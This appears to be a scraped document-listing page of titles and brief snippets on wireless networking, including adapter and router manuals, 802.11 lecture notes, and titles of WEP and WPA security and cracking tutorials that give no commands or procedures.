Wireless LANs. ITS 413 Internet Technologies and Applications Wireless LANs ITS 413 Internet Technologies and Applications Aim: Aim and Contents Understand how IEEE 802.11 wireless LANs work Understand what influences the performance of wireless LANs Contents: IEEE

More information

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis CS-435 spring semester 2016 Network Technology & Programming Laboratory University of Crete Computer Science Department Stefanos Papadakis & Manolis Spanakis CS-435 Lecture preview 802.11 Security IEEE

More information

SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide

SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide SAGEM Wi-Fi 11g USB ADAPTER Quick Start Guide About this guide This Quick Start Guide describes how to install and operate your SAGEM Wi-Fi 11g USB ADAPTER. Please read this manual before you install the

More information

Wireless Router at Home

Wireless Router at Home Wireless Router at Home 192.168.1.2 192.168.1.1 Modem 192.168.1.3 120.6.46.15 telephone line to ISP 192.168.1.4 Internet connection with public IP internal LAN with private IPs 192.168.1.5 Wireless All-in-one

More information

WL-5420AP. User s Guide

WL-5420AP. User s Guide WL-5420AP User s Guide Table of contents INTRODUCTION... 1 About the Operation Modes...2 LED Indicators...5 Solid...5 Ports on the Rear Panel...7 GETTING CONNECTED... 8 WPA AP -CONFIGURATION VIA WEB...

More information

Wireless LAN USB Stick AWL400. User Manual. Version 1.1 June BENQ Corporation

Wireless LAN USB Stick AWL400. User Manual. Version 1.1 June BENQ Corporation Wireless LAN USB Stick AWL400 User Manual Version 1.1 June 2002 Notice I Copyright Statement This manual cannot be reproduced in any form or by any means or used to make any derivative such as translation,

More information

Wireless Technologies

Wireless Technologies Wireless Technologies Networking for Home and Small Businesses Chapter 7 Manju. V. Sankar 1 Objectives Describe wireless technologies. Describe the various components and structure of a WLAN Describe wireless

More information

Installing driver over the network

Installing driver over the network Installing driver over the network Command- line Definition Description Command- line Definition Description /a or /A /n or /N /nd or /ND Specifies

More information

ECE 435 Network Engineering Lecture 8

ECE 435 Network Engineering Lecture 8 ECE 435 Network Engineering Lecture 8 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 26 September 2016 HW#3 was posted Announcements note the warnings you were getting on toupper()

More information

Outdoor Wireless USB Adapter User Guide

Outdoor Wireless USB Adapter User Guide Outdoor Wireless USB Adapter User Guide FCC STATEMENT This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to part 15 of the FCC Rules. These limits

More information

Wireless USB Port Multi-Functional Printer Server. Model # AMPS240W. User s Manual. Ver. 1A

Wireless USB Port Multi-Functional Printer Server. Model # AMPS240W. User s Manual. Ver. 1A Wireless USB 2.0 1-Port Multi-Functional Printer Server Model # AMPS240W User s Manual Ver. 1A Table of Contents 1 Introduction...3 1.1 Package Contents... 3 1.2 System Requirements... 3 2 Multi-Functional

More information

Section 4 Cracking Encryption and Authentication

Section 4 Cracking Encryption and Authentication Section 4 Cracking 802.11 Encryption and Authentication In the previous section we showed the vulnerabilities of Open Wireless LANs. In this section we ll show some of the techniques and tools used to

More information

Wireless# Guide to Wireless Communications. Objectives

Wireless# Guide to Wireless Communications. Objectives Wireless# Guide to Wireless Communications Chapter 8 High-Speed WLANs and WLAN Security Objectives Describe how IEEE 802.11a networks function and how they differ from 802.11 networks Outline how 802.11g

More information

To search type and hit enter

To search type and hit enter Contact Us Advertise Disclaimer Privacy Policy Sitemap Write for Us To search type and hit enter Home Android Linux Raspberry Pi PHP Tricks Windows Tech News WordPress Videos Apps Forum Home -> Linux ->

More information

WIRELESS USB 2.0 ADAPTER. Manual (DN & DN )

WIRELESS USB 2.0 ADAPTER. Manual (DN & DN ) WIRELESS USB 2.0 ADAPTER Manual (DN-7043-4 & DN-7053-2) 1. Introduction... 1 2. Wireless LAN Basics... 3 3. IP ADDRESS... 4 4. Install Driver/Utility... 5 4.1 Windows XP/Vista... 5 5. Wireless Network

More information

Basic processes in IEEE networks

Basic processes in IEEE networks Module contents IEEE 802.11 Terminology IEEE 802.11 MAC Frames Basic processes in IEEE802.11 networks Configuration parameters IEEE 802.11 Terminology Station (STA) Architecture: Device that contains IEEE

More information

Configuring Layer2 Security

Configuring Layer2 Security Prerequisites for Layer 2 Security, page 1 Configuring Static WEP Keys (CLI), page 2 Configuring Dynamic 802.1X Keys and Authorization (CLI), page 2 Configuring 802.11r BSS Fast Transition, page 3 Configuring

More information

b/g/n 1T1R Wireless USB Adapter. User s Manual

b/g/n 1T1R Wireless USB Adapter. User s Manual 802.11 b/g/n 1T1R Wireless USB Adapter User s Manual Federal Communication Commission Interference Statement This equipment has been tested and found to comply with the limits for a Class B digital device,

More information

This repository. Insights. Projects 0. Join GitHub today

This repository. Insights. Projects 0. Join GitHub today Features Business Explore Marketplace Pricing brannondorsey / wifi-cracking Code Issues 0 Pull requests 1 Sign in or Sign up This repository Watch Projects 0 73 Star 2,627 Fork 183 Insights Dismiss Join

More information

Wireless Security Algorithms

Wireless Security Algorithms (NOTE: If you are using a virtual lab to run your attacks you will need an external Wi Fi attachment. The other option is to have a direct install on your computer. Virtual labs cannot access your wireless

More information

Wireless LAN USB Super G 108 Mbit. Manual

Wireless LAN USB Super G 108 Mbit. Manual Wireless LAN USB Super G 108 Mbit Manual Dear Customer, Thanks for choosing Hamlet. Please carefully follow the instructions for its use and maintenance and, once this item has run its life span, we kindly

More information

Wireless Protocols. Training materials for wireless trainers

Wireless Protocols. Training materials for wireless trainers Wireless Protocols Training materials for wireless trainers Goals The goal of this lecture is to introduce: IEEE wireless protocols coverage 802.11 radio protocols terminology WiFi modes of operation details

More information

Fast Location-based Association of Wi-Fi Direct for Distributed Wireless Docking Services

Fast Location-based Association of Wi-Fi Direct for Distributed Wireless Docking Services Fast Location-based Association of Wi-Fi Direct for Distributed Wireless Docking Services Jina Han Department of Information and Computer Engineering Ajou University Suwon, South Korea hangn0808@ajou.ac.kr

More information

Chapter 17. Wireless Network Security

Chapter 17. Wireless Network Security Chapter 17 Wireless Network Security IEEE 802.11 IEEE 802 committee for LAN standards IEEE 802.11 formed in 1990 s, to develop a protocol & transmission specifications for wireless LANs (WLANs) Demand

More information

Table of Contents 1 WLAN Service Configuration 1-1

Table of Contents 1 WLAN Service Configuration 1-1 Table of Contents 1 WLAN Service Configuration 1-1 WLAN Service Overview 1-1 Terminology 1-1 Wireless Client Access 1-2 802.11 Overview 1-4 WLAN Topologies 1-5 Single BSS 1-5 Multi-ESS 1-5 Single ESS Multiple

More information

NW611. AC600 WiFi Dual Band USB Adapter with 5dBi Antenna

NW611. AC600 WiFi Dual Band USB Adapter with 5dBi Antenna NW611 AC600 WiFi Dual Band USB Adapter with 5dBi Antenna Chapter 1: Introduction..3 1.1 Product Features..3 1.2 Package Contents.3 1.3 Indicator Description.3 CHAPTER 2: Quick Installation Guide.4 2.1

More information

802.11N Wireless Broadband Router

802.11N Wireless Broadband Router 802.11N Wireless Broadband Router Pre-N Wireless Access Point Broadband Internet Access WPS 4-Port Switching Hub User's Guide Table of Contents CHAPTER 1 INTRODUCTION... 1 Wireless Router Features... 1

More information

54Mbps Pocket Wireless Access Point (WL-330g)

54Mbps Pocket Wireless Access Point (WL-330g) 54Mbps Pocket Wireless Access Point (WL-330g) Copyright 2004 ASUSTeK COMPUTER INC. All Rights Reserved. Contents Conventions... 2 Welcome!... 3 Package contents... 3 System requirements... 3 Device installation...

More information

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne Introduction to Wireless Networking and Security Chino Information Technology Center Steve Siedschlag, Associate Professor What is a Wireless LAN? The wireless telegraph is not difficult to understand.

More information

What is Eavedropping?

What is Eavedropping? WLAN Security What is Eavedropping? War Driving War Driving refers to someone driving around with a laptop and an 802.11 client card looking for an 802.11 system to exploit. War Walking Someone walks

More information

WIRELESS 150N USB 2.0 ADAPTER

WIRELESS 150N USB 2.0 ADAPTER WIRELESS 150N USB 2.0 ADAPTER DN-70440-1 Rev.2 DN-7042-1 Rev.3 Manual DN-70440-1 Rev.2 DN-7042-1 Rev.3 1 / 38 Chapter 1: Introduction..3 1.1 Product Features..3 1.2 Package Contents.3 1.3 Indicator Description.3

More information

CSC344 Wireless and Mobile Computing. Department of Computer Science COMSATS Institute of Information Technology

CSC344 Wireless and Mobile Computing. Department of Computer Science COMSATS Institute of Information Technology CSC344 Wireless and Mobile Computing Department of Computer Science COMSATS Institute of Information Technology Wireless Local Area Networks (WLANs) Part II WiFi vs 802.11 IEEE 802.11 Features Hidden Node

More information

802.11g PC Card/USB Wireless Adapter

802.11g PC Card/USB Wireless Adapter 802.11g PC Card/USB Wireless Adapter User Guide Regulatory Approvals FCC Statement This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to Part 15 of

More information

WF-2402 Quick Installation Guide

WF-2402 Quick Installation Guide WF-2402 Quick Installation Guide Netis 150Mbps Wireless-N Broadband Router 1. Check Your Package Contents The following items should be found in your package: 150Mbps Wireless-N Broadband Router Power

More information

Bluetooth SIG Liaison Report May 2009

Bluetooth SIG Liaison Report May 2009 Bluetooth SIG Liaison Report May 2009 Authors: Date: 2009-05-12 The Bluetooth word mark and logos are registered trademarks owned by Bluetooth SIG, Inc. and any use of such marks by Motorola, Inc. is under

More information

PMS 138 C Moto Black spine width spine width 100% 100%

PMS 138 C Moto Black spine width spine width 100% 100% Series MOTOROLA and the Stylized M Logo are registered in the US Patent & Trademark Office. All other product or service names are the property of their respective owners. 2009 Motorola, Inc. Table of

More information

CS263: Wireless Communications and Sensor Networks

CS263: Wireless Communications and Sensor Networks CS263: Wireless Communications and Sensor Networks Matt Welsh Lecture 5: The 802.11 Standard October 7, 2004 2004 Matt Welsh Harvard University 1 All about 802.11 Today's Lecture CSMA/CD MAC and DCF WEP

More information

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This

More information

WRE2206. User s Guide. Quick Start Guide. Wireless N300 Range Extender. Default Details. Version 1.00 Edition 1, 01/2015

WRE2206. User s Guide. Quick Start Guide. Wireless N300 Range Extender. Default Details. Version 1.00 Edition 1, 01/2015 WRE2206 Wireless N300 Range Extender Version 1.00 Edition 1, 01/2015 Quick Start Guide User s Guide Default Details Web Address http://zyxelsetup OR http://192.168.1.2 www.zyxel.com User Name admin Password

More information

BLUEGIGA WF111 SOFTWARE DRIVERS

BLUEGIGA WF111 SOFTWARE DRIVERS BLUEGIGA WF111 SOFTWARE DRIVERS RELEASE NOTES Thursday, 2 February 2017 Version 5.2.2-r3 Copyright Silicon Labs All rights reserved. Silicon Labs assumes no liability or responsibility for any errors,

More information

High Gain USB Wireless Adapter RNX-AC600HGUBE. User Manual

High Gain USB Wireless Adapter RNX-AC600HGUBE. User Manual RNX-AC600HGUBE User Manual Table of Contents Chapter 1: Introduction....... 03 1.1 Product Features.... 03 1.2 Package Contents...... 03 1.3 Indicator Description... 03 CHAPTER 2: Quick Installation Guide......

More information

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012 NWD2705 Dual-Band Wireless N450 USB Adapter Version 1.00 Edition 1, 09/2012 Quick Start Guide User s Guide www.zyxel.com Copyright 2012 ZyXEL Communications Corporation IMPORTANT! READ CAREFULLY BEFORE

More information

APC-100. IEEE g Wireless USB Adapter. User s Guide v1.0

APC-100. IEEE g Wireless USB Adapter. User s Guide v1.0 APC-100 IEEE 802.11g Wireless USB Adapter User s Guide v1.0 FCC Certifications Federal Communication Commission Interference Statement This equipment has been tested and found to comply with the limits

More information

Wireless-N USB Adapter User s Manual

Wireless-N USB Adapter User s Manual Wireless-N USB Adapter User s Manual Copyright 2007 EUSSO Technologies, Inc. All rights reserved. Table of Contents PREFACE... 3 WIRELESS LAN BASICS... 3 Warning... 3 INSTALLATION OVERVIEW... 4 INTRODUCTION...

More information

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft

Light Mesh AP. User s Guide. 2009/2/20 v1.0 draft Light Mesh AP User s Guide 2009/2/20 v1.0 draft i FCC Certifications This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to Part 15 of the FCC Rules.

More information

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT 1. P. ČISAR, 2. S. MARAVIĆ ČISAR ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT 1. Academy of Criminalistic and Police Studies, 11080 Belgrade - Zemun, Cara Dusana 196, SERBIA 2. Subotica

More information

PRODUCT GUIDE Wireless Intrusion Prevention Systems

PRODUCT GUIDE Wireless Intrusion Prevention Systems PRODUCT GUIDE Wireless Intrusion Prevention Systems The Need for Wireless INTRUSION PREVENTION SYSTEMS A Wireless Intrusion Prevention System (WIPS) is designed to address two classes of challenges facing

More information

WUG2690 User s Manual

WUG2690 User s Manual 802.11b+g Wireless LAN USB Adapter WUG2690 User s Manual Federal Communication Commission Interference Statement This equipment has been tested and found to comply with the limits for a Class B digital

More information

Using aircrack and a dictionary to crack a WPA data capture

Using aircrack and a dictionary to crack a WPA data capture Step by Step Backtrack 5 and wireless Hacking basics Installing Backtrack 5 Creating a Backtrack 5 R3 Live CD Installing to the Hard drive Installing and running with VMware Reaver WPA dictionary attack

More information

Security of WiFi networks MARCIN TUNIA

Security of WiFi networks MARCIN TUNIA Security of WiFi networks MARCIN TUNIA Agenda 1. Wireless standards 2. Hidden network and MAC filtering protection bypassing 3. Encryption independent attacks 4. Attacks on WEP 5. Attacks on WPA/WPA2 6.

More information

Wireless Network Security

Wireless Network Security Wireless Network Security Wireless LAN Security Slide from 2 nd book 1 802.11 Wireless LAN Security Stations in LAN are connected physically while in WLAN any station in the radio range is connected, so

More information

Tutorial: Simple WEP Crack

Tutorial: Simple WEP Crack Tutorial: Simple WEP Crack Version: 1.20 January 11, 2010 By: darkaudax Introduction This tutorial walks you though a very simple case to crack a WEP key. It is intended to build your basic skills and

More information

Frequently Asked Questions WPA2 Vulnerability (KRACK)

Frequently Asked Questions WPA2 Vulnerability (KRACK) Frequently Asked Questions WPA2 Vulnerability (KRACK) Release Date: October 20, 2017 Document version: 1.0 What is the issue? A research paper disclosed serious vulnerabilities in the WPA and WPA2 key

More information

Wireless LAN Access Point

Wireless LAN Access Point Wireless LAN Access Point IEEE 802.11b/g 54Mbps 501903 User s Manual Table of Contents Chapter 1 Introduction... 1 1.1 Package Contents... 2 1.2 Features... 2 1.3 Specifications... 2 1.4 Physical Description...

More information

How Insecure is Wireless LAN?

How Insecure is Wireless LAN? Page 1 of 7 How Insecure is Wireless LAN? Abstract Wireless LAN has gained popularity in the last few years due to its enormous benefits such as scalability, mobile access of the network, and reduced cost

More information

Wireless LAN Access Point

Wireless LAN Access Point Wireless LAN Access Point IEEE 802.11b/g 54Mbps User s Manual Table of Contents Chapter 1 Introduction... 1 1.1 Package Contents... 2 1.2 Features... 2 1.3 Specifications... 2 1.4 Physical Description...

More information

Wireless Security Protocol Analysis and Design. Artoré & Bizollon : Wireless Security Protocol Analysis and Design

Wireless Security Protocol Analysis and Design. Artoré & Bizollon : Wireless Security Protocol Analysis and Design Protocol Analysis and Design 1 Networks 1. WIRELESS NETWORKS 2 Networks 1. WIRELESS NETWORKS 1.1 WiFi 802.11 3 Networks OSI Structure 4 Networks Infrastructure Networks BSS : Basic Set Service ESS : Extended

More information

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Today s challenge on Wireless Networking David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Agenda How Popular is Wireless Network? Threats Associated with Wireless Networking

More information

CWNP PW Certified Wireless Analysis Professional. Download Full Version :

CWNP PW Certified Wireless Analysis Professional. Download Full Version : CWNP PW0-270 Certified Wireless Analysis Professional Download Full Version : http://killexams.com/pass4sure/exam-detail/pw0-270 QUESTION: 50 ABC Company is having VoWiFi latency problems on their 802.11g

More information

NM6000 User's guide v1.2

NM6000 User's guide v1.2 USER S GUIDE NM6000 WLAN Clientt http://www.wiznet.co.kr Copyright 2004 WIZNET Inc. All Rights Reserved. 1 Table of Contents 1 INSTALLATION...3 1.1 POINTS TO REMEMBER BEFORE INSTALLATION...3 1.2 ACCESSING

More information

Wednesday, May 16, 2018

Wednesday, May 16, 2018 Wednesday, May 16, 2018 8:00 AM - 5:00 PM Wi Fi/WLAN Fundamentals Training by Tessco; Day Two of a Two Day Training. (Attendees must bring laptop computers for this training. Attendees should bring available

More information

AIRNET 54Mb b/g High Power USB Adapter. User s Manual

AIRNET 54Mb b/g High Power USB Adapter. User s Manual AIRNET 54Mb 802.11b/g High Power USB Adapter User s Manual FCC Certifications Federal Communication Commission Interference Statement This equipment has been tested and found to comply with the limits

More information

High Power g Wireless USB Adapter USER MANUAL 1.0.0

High Power g Wireless USB Adapter USER MANUAL 1.0.0 High Power 802.11g Wireless USB Adapter USER MANUAL 1.0.0 2009 Table of Contents Chapter I USING THIS DOCUMENT 3 Chapter II INTRODUCTION 3 Chapter III SYSTEM REQUIREMENTS 3 Chapter IV Driver Installation

More information

CSCD 433/533 Advanced Networking

CSCD 433/533 Advanced Networking CSCD 433/533 Advanced Networking Lecture 6 Wireless LAN Components and Characteristics Winter 2017 Some Material in these slides from J.F Kurose and K.W. Ross All material copyright 1996-2007 1 Introduction

More information